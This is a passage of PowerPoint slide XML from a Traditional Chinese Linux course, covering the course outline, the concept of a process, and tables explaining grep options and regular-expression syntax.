              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="3257640" y="3228840"/>
              <a:ext cx="707400" cy="7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41800" y="3165480"/>
                <a:ext cx="73908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" name="筆跡 12"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="4664880" y="3250440"/>
              <a:ext cx="1707840" cy="216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649040" y="3186720"/>
                <a:ext cx="173952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4" name="筆跡 13"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="5607720" y="2671560"/>
              <a:ext cx="1765080" cy="3218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591880" y="2608200"/>
                <a:ext cx="1796760" cy="44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5" name="筆跡 14"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="7229520" y="2678760"/>
              <a:ext cx="307440" cy="41472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213680" y="2615400"/>
                <a:ext cx="339120" cy="54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6" name="筆跡 15"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="7450920" y="3264480"/>
              <a:ext cx="507600" cy="75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435080" y="3201120"/>
                <a:ext cx="53928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" name="筆跡 16"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1000080" y="3814560"/>
              <a:ext cx="3372120" cy="291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84240" y="3751200"/>
                <a:ext cx="3403800" cy="15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235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0308819"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="457200" y="1481138"/>
          <a:ext cx="8229600" cy="32004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024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7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3100" b="0" dirty="0" smtClean="0"/>
                        <a:t>-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="3100" b="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>i</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-TW" altLang="en-US" sz="31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100" b="0" dirty="0" smtClean="0"/>
                        <a:t>忽略大小寫的不同</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="3100" b="0" dirty="0" smtClean="0"/>
                        <a:t>,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="3100" b="0" dirty="0" smtClean="0"/>
                        <a:t>也就是大小寫都會視為相同。</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-TW" altLang="en-US" sz="31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100" b="0" dirty="0" smtClean="0"/>
                        <a:t>-v</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-TW" altLang="en-US" sz="31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100" b="0" dirty="0" smtClean="0"/>
                        <a:t>反向選擇</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="3100" b="0" dirty="0" smtClean="0"/>
                        <a:t>,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="3100" b="0" dirty="0" smtClean="0"/>
                        <a:t>也就是說顯示出沒有 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="3100" b="0" dirty="0" smtClean="0"/>
                        <a:t>'</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="3100" b="0" dirty="0" smtClean="0"/>
                        <a:t>搜尋字串</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="3100" b="0" dirty="0" smtClean="0"/>
                        <a:t>'</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="3100" b="0" dirty="0" smtClean="0"/>
                        <a:t>內容的那一行</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-TW" altLang="en-US" sz="31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100" b="0" dirty="0" smtClean="0"/>
                        <a:t>-n</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-TW" altLang="en-US" sz="31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100" b="0" dirty="0" smtClean="0"/>
                        <a:t>輸出行號</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="3100" b="0" dirty="0" smtClean="0"/>
                        <a:t>,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="3100" b="0" dirty="0" smtClean="0"/>
                        <a:t>在每行的前面加上行號</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-TW" altLang="en-US" sz="31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100" b="0" dirty="0" smtClean="0"/>
                        <a:t>-c</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-TW" altLang="en-US" sz="31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100" b="0" dirty="0" smtClean="0"/>
                        <a:t>計算找到 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="3100" b="0" dirty="0" smtClean="0"/>
                        <a:t>'</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="3100" b="0" dirty="0" smtClean="0"/>
                        <a:t>搜尋字串</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="3100" b="0" dirty="0" smtClean="0"/>
                        <a:t>' </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="3100" b="0" dirty="0" smtClean="0"/>
                        <a:t>的次數</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="3100" b="0" dirty="0" smtClean="0"/>
                        <a:t>(count)</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-TW" altLang="en-US" sz="31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ep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>參數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19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71680" y="1771560"/>
              <a:ext cx="470160" cy="68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5480" y="1708200"/>
                <a:ext cx="5022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609480" y="2825640"/>
              <a:ext cx="362520" cy="259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3640" y="2762280"/>
                <a:ext cx="3942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99960" y="3873600"/>
              <a:ext cx="51480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4120" y="3809880"/>
                <a:ext cx="5464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06440" y="4464000"/>
              <a:ext cx="55260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90600" y="4400640"/>
                <a:ext cx="584640" cy="133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1231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fld id="{90B2005B-CDF2-4B24-BA9D-FE05B4128644}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400"/>
              <a:pPr algn="r" eaLnBrk="1" hangingPunct="1"/>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW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b="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:ea typeface="標楷體" pitchFamily="65" charset="-120"/>
              </a:rPr>
              <a:t>大綱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268760"/>
            <a:ext cx="8064896" cy="5040312"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/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作業系統介紹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en-US" altLang="zh-TW" sz="2800" dirty="0">
                <a:latin typeface="標楷體" pitchFamily="65" charset="-120"/>
                <a:ea typeface="標楷體" pitchFamily="65" charset="-120"/>
              </a:rPr>
              <a:t>Linux</a:t>
            </a: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系統介紹及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使用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檔案權限與目錄配置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檔案</a:t>
            </a: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與目錄管理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檔案系統特性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檔案的壓縮、解壓縮與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打包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en-US" altLang="zh-TW" sz="2800" dirty="0">
                <a:latin typeface="標楷體" pitchFamily="65" charset="-120"/>
                <a:ea typeface="標楷體" pitchFamily="65" charset="-120"/>
              </a:rPr>
              <a:t>Vim </a:t>
            </a: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文書編輯軟體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正規表示法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帳號管理與</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0">
                <a:latin typeface="標楷體" pitchFamily="65" charset="-120"/>
                <a:ea typeface="標楷體" pitchFamily="65" charset="-120"/>
              </a:rPr>
              <a:t>ACL</a:t>
            </a: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權限設定</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="812800" indent="-812800" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buAutoNum type="ea1ChtPeriod"/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常用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="標楷體" pitchFamily="65" charset="-120"/>
                <a:ea typeface="標楷體" pitchFamily="65" charset="-120"/>
              </a:rPr>
              <a:t>網路指令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5970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</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7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en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Process </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>程序、進程 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/>
              <a:t>概念</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>上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點</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>開應用程式就是將 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Program </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>活化成 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Process </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>，因此我們可以在活動監控器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>工作管理員</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>中看到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>PID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>，也就是執行中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Process 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實體上</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>已經 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Load </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>到記憶體中執行的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Program(code) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>，程序中的每一行程式碼隨時都有可能被</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>CPU</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>執行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2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Process </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>是電腦中已執行 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Program </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>的實體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2"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>每一個 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Process </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>是互相獨立的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2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Process </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>需要一些資源才能完成工作，如 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>CPU</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>、記憶體、檔案以及</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>I/O</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>裝置。	</a:t>
            </a:r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4429080" y="2514600"/>
              <a:ext cx="986400" cy="78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13240" y="2450880"/>
                <a:ext cx="101808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筆跡 4"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="5693400" y="2450160"/>
              <a:ext cx="2222280" cy="75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77560" y="2386800"/>
                <a:ext cx="225396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3707640" y="2900160"/>
              <a:ext cx="3093480" cy="1432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691800" y="2836800"/>
                <a:ext cx="3125160" cy="27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686720" y="2892960"/>
              <a:ext cx="500400" cy="21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670880" y="2829600"/>
                <a:ext cx="53208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700360" y="3300480"/>
              <a:ext cx="2107800" cy="572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684520" y="3236760"/>
                <a:ext cx="21394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514600" y="4271760"/>
              <a:ext cx="5208120" cy="648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498760" y="4208400"/>
                <a:ext cx="523980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685880" y="5000400"/>
              <a:ext cx="1057680" cy="147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670040" y="4937040"/>
                <a:ext cx="108936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114720" y="5064840"/>
              <a:ext cx="2986560" cy="147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098880" y="5001480"/>
                <a:ext cx="301824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778760" y="5529240"/>
              <a:ext cx="176472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762920" y="5465520"/>
                <a:ext cx="1796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4314960" y="5443560"/>
              <a:ext cx="1086120" cy="216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299120" y="5379840"/>
                <a:ext cx="111780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771560" y="5914800"/>
              <a:ext cx="100044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755720" y="5851440"/>
                <a:ext cx="10321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2900520" y="5879160"/>
              <a:ext cx="664560" cy="360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884320" y="5815800"/>
                <a:ext cx="6966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4229280" y="5929200"/>
              <a:ext cx="493200" cy="3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4213080" y="5865840"/>
                <a:ext cx="5252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7286760" y="5950800"/>
              <a:ext cx="564480" cy="7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270920" y="5887080"/>
                <a:ext cx="59616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8208000" y="5900760"/>
              <a:ext cx="329040" cy="75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8192160" y="5837040"/>
                <a:ext cx="3607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1664640" y="6357960"/>
              <a:ext cx="3121920" cy="75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648440" y="6294240"/>
                <a:ext cx="315396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907920" y="1573920"/>
              <a:ext cx="1352520" cy="720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892080" y="1510560"/>
                <a:ext cx="1384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4258440" y="5545080"/>
              <a:ext cx="1104120" cy="68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4242600" y="5481720"/>
                <a:ext cx="113580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04993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7152850"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="457200" y="1481138"/>
          <a:ext cx="8229600" cy="41148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024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7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^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'^grep'</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="3000" b="0" dirty="0" smtClean="0"/>
                        <a:t>符合所有以</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="3000" b="0" dirty="0" smtClean="0"/>
                        <a:t>grep</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="3000" b="0" dirty="0" smtClean="0"/>
                        <a:t>開頭的行。 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$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尋找行的結束如：</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="3000" b="0" dirty="0" smtClean="0"/>
                        <a:t>'grep$'</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="3000" b="0" dirty="0" smtClean="0"/>
                        <a:t>符合所有以</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="3000" b="0" dirty="0" smtClean="0"/>
                        <a:t>grep</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="3000" b="0" dirty="0" smtClean="0"/>
                        <a:t>結尾的行。 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.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符合一個非換行符的字元如：</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="3000" b="0" dirty="0" smtClean="0"/>
                        <a:t>'</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="3000" b="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>gr.p</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="3000" b="0" dirty="0" smtClean="0"/>
                        <a:t>'</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="3000" b="0" dirty="0" smtClean="0"/>
                        <a:t>符合</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="3000" b="0" dirty="0" smtClean="0"/>
                        <a:t>gr</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="3000" b="0" dirty="0" smtClean="0"/>
                        <a:t>後接一個任意字元，然後是</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="3000" b="0" dirty="0" smtClean="0"/>
                        <a:t>p</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="3000" b="0" dirty="0" smtClean="0"/>
                        <a:t>。 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*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符合零個或多個先前字元如：</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="3000" b="0" dirty="0" smtClean="0"/>
                        <a:t>'*grep'</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="3000" b="0" dirty="0" smtClean="0"/>
                        <a:t>符合所有一個或多個空格後緊跟</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="3000" b="0" dirty="0" smtClean="0"/>
                        <a:t>grep</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="3000" b="0" dirty="0" smtClean="0"/>
                        <a:t>的行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.* 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一起用代表任意字元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ep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的正規則</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>表達式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58720" y="1657440"/>
              <a:ext cx="241560" cy="255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2880" y="1593720"/>
                <a:ext cx="2736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663560" y="1822320"/>
              <a:ext cx="64836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47720" y="1758960"/>
                <a:ext cx="6800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267080" y="1720800"/>
              <a:ext cx="274356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51240" y="1657440"/>
                <a:ext cx="27752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82760" y="2298600"/>
              <a:ext cx="41292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6560" y="2235240"/>
                <a:ext cx="444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137360" y="2349360"/>
              <a:ext cx="160056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121520" y="2286000"/>
                <a:ext cx="16322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397160" y="2825640"/>
              <a:ext cx="27324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380960" y="2762280"/>
                <a:ext cx="3052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441440" y="1644480"/>
              <a:ext cx="133560" cy="259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425600" y="1581120"/>
                <a:ext cx="1656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5308560" y="2311560"/>
              <a:ext cx="120960" cy="25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292720" y="2247840"/>
                <a:ext cx="152640" cy="153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684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07574"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="457200" y="1481138"/>
          <a:ext cx="8229600" cy="24688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09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9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[]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符合一個指定範圍內的字元，如</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="3000" b="0" dirty="0" smtClean="0"/>
                        <a:t>'[Gg]rep'</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="3000" b="0" dirty="0" smtClean="0"/>
                        <a:t>符合</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="3000" b="0" dirty="0" smtClean="0"/>
                        <a:t>Grep</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="3000" b="0" dirty="0" smtClean="0"/>
                        <a:t>和</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="3000" b="0" dirty="0" smtClean="0"/>
                        <a:t>grep</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="3000" b="0" dirty="0" smtClean="0"/>
                        <a:t>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[^]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符合一個不在指定範圍內的字元，如：</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="3000" b="0" dirty="0" smtClean="0"/>
                        <a:t>'[^A-FH-Z]rep'</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="3000" b="0" dirty="0" smtClean="0"/>
                        <a:t>符合不包含</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="3000" b="0" dirty="0" smtClean="0"/>
                        <a:t>AR</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="3000" b="0" dirty="0" smtClean="0"/>
                        <a:t>和</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="3000" b="0" dirty="0" smtClean="0"/>
                        <a:t>TZ</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="3000" b="0" dirty="0" smtClean="0"/>
                        <a:t>的一個字母開頭，緊跟</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="3000" b="0" dirty="0" smtClean="0"/>
                        <a:t>rep</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="3000" b="0" dirty="0" smtClean="0"/>
                        <a:t>的行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ep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>正</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>規則</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>表達式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2702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1214258"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="457200" y="1481138"/>
          <a:ext cx="8229600" cy="301752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8105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19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x\{m\}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重複字元</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="3000" b="0" dirty="0" smtClean="0"/>
                        <a:t>x</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="3000" b="0" dirty="0" smtClean="0"/>
                        <a:t>，</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="3000" b="0" dirty="0" smtClean="0"/>
                        <a:t>m</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="3000" b="0" dirty="0" smtClean="0"/>
                        <a:t>次，如：</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="3000" b="0" dirty="0" smtClean="0"/>
                        <a:t>‘o\{5\}'</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="3000" b="0" dirty="0" smtClean="0"/>
                        <a:t>符合包含</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="3000" b="0" dirty="0" smtClean="0"/>
                        <a:t>5</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="3000" b="0" dirty="0" smtClean="0"/>
                        <a:t>個</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="3000" b="0" dirty="0" smtClean="0"/>
                        <a:t>o</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="3000" b="0" dirty="0" smtClean="0"/>
                        <a:t>的行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x\{m,\}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重複字元</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="3000" b="0" dirty="0" smtClean="0"/>
                        <a:t>x, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="3000" b="0" dirty="0" smtClean="0"/>
                        <a:t>至少</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="3000" b="0" dirty="0" smtClean="0"/>
                        <a:t>m</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="3000" b="0" dirty="0" smtClean="0"/>
                        <a:t>次，如：</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="3000" b="0" dirty="0" smtClean="0"/>
                        <a:t>'o\{5,\}'</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="3000" b="0" dirty="0" smtClean="0"/>
                        <a:t>符合至少有</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="3000" b="0" dirty="0" smtClean="0"/>
                        <a:t>5</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="3000" b="0" dirty="0" smtClean="0"/>
                        <a:t>個</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="3000" b="0" dirty="0" smtClean="0"/>
                        <a:t>o</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="3000" b="0" dirty="0" smtClean="0"/>
                        <a:t>的行。 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3000" b="0" dirty="0" smtClean="0"/>
                        <a:t>x\{</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="3000" b="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>m,n</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="3000" b="0" dirty="0" smtClean="0"/>
                        <a:t>\}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3000" b="0" dirty="0" smtClean="0"/>
                        <a:t>重複字元</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="3000" b="0" dirty="0" smtClean="0"/>
                        <a:t>x</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="3000" b="0" dirty="0" smtClean="0"/>
                        <a:t>，至少</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="3000" b="0" dirty="0" smtClean="0"/>
                        <a:t>m</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="3000" b="0" dirty="0" smtClean="0"/>
                        <a:t>次，不多於</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="3000" b="0" dirty="0" smtClean="0"/>
                        <a:t>n</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="3000" b="0" dirty="0" smtClean="0"/>
                        <a:t>次，如：</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="3000" b="0" dirty="0" smtClean="0"/>
                        <a:t>'o\{5,10\}'</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="3000" b="0" dirty="0" smtClean="0"/>
                        <a:t>符合</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="3000" b="0" dirty="0" smtClean="0"/>
                        <a:t>5--10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="3000" b="0" dirty="0" smtClean="0"/>
                        <a:t>個</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="3000" b="0" dirty="0" smtClean="0"/>
                        <a:t>o</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="3000" b="0" dirty="0" smtClean="0"/>
                        <a:t>的行。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ep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>正</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>規則</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
